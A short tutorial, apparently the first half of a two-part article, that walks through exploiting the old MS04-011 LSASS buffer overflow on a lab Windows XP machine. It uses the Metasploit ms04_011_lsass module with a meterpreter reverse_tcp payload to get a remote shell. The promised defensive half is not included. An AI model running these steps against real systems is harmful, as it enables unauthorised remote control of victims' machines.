Critical System Protection

I am writing this article into 2 parts, In 1st part i will show you how to exploit Microsoft LSASS Service Buffer Overflow Vulnerability in windows with Metasploit Express Edition and In 2nd part i will show you how 

to prevent exploitation of Microsoft LSASS Service Buffer Overflow Vulnerability in windows with Symantec Critical System Protection (SCSP).

 

 

This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter.

 

 

1. Our Victim is using windows xp professional SP2 (192.168.42.72).

 

    

 

2. I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.179.

 

3. I am using windows/smb/ms04_011_lsass metasploit module to exploit Microsoft LSASS Service Buffer Overflow (use exploit/windows/smb/ms04_011_lsass).

 

    

 

4. To view available option run show options command.

 

    

 

5. I have to set the RHOST i.e. Target machine ip address (set srvhost 192.168.42.72).

 

    

 

6. I am using windows/meterpreter/reverse_tcp payload.

 

    

 

7. Now i have to enter LHOST (Local Host) i.e 192.168.42.179 (Attacker Machine IP Address).

 

    

 

8. Write exploit and Hit Enter. Exploit will execute on Victim machine and give shell to the attacker machine. Attacker got the meterpreter shell of victim machine.

 

    

 

9. Let's type ipconfig command to verify wheather we enter into victim machine or not.